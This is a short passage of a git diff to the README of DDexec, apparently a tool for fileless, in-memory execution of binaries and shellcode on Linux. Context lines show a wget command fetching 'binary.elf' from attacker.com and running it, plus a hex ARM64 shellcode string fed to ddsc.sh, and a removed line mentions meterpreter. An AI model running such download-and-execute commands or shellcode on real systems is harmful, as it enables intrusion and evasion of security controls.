arget13/DDexec/README.md

 wget -O 4 https://attacker.com/binary.elf
 ./4
 ```
-In ARM64 the process is similar, only the shellcode changes
+In ARM64 the process is the same.
 ```
 bash ddsc.sh -x <<< "802888d2a088a8f2e00f1ff8e0030091210001cae82280d2010000d4c80580d2010000d4881580d2010000d4610280d2281080d2010000d4"
 ```

-And yes.
-It works with meterpreter.

 Tested Linux distributions are Debian, Alpine and Arch.
 Supported shells are bash, zsh and ash (busybox); on x86_64 and aarch64 (arm64) architectures.